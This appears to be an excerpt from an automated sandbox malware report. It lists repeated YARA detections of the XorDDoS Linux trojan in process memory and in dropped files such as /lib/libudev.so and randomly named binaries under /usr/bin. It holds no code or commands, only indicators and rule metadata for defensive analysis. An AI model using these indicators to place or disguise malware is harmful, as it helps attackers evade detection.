            Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9451, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9454, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9457, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9462, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9552, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9563, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9574, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9585, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9596, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9607, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9618, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9629, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9640, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9651, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9662, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9673, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9684, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9695, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9706, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9717, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9728, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9739, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9750, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9761, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /lib/libudev.so, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/wzhmvohlxs, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/wzhmvohlxs, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/wzhmvohlxs, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/emnaztxelb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/hiueshutol, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/hiueshutol, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/hiueshutol, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/mhvrcmaysv, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/mhvrcmaysv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/mhvrcmaysv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/lnmgbribvb, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/lnmgbribvb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/lnmgbribvb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/hgfzmygnbx, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/wdcujvrbpo, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/hgfzmygnbx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/hgfzmygnbx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
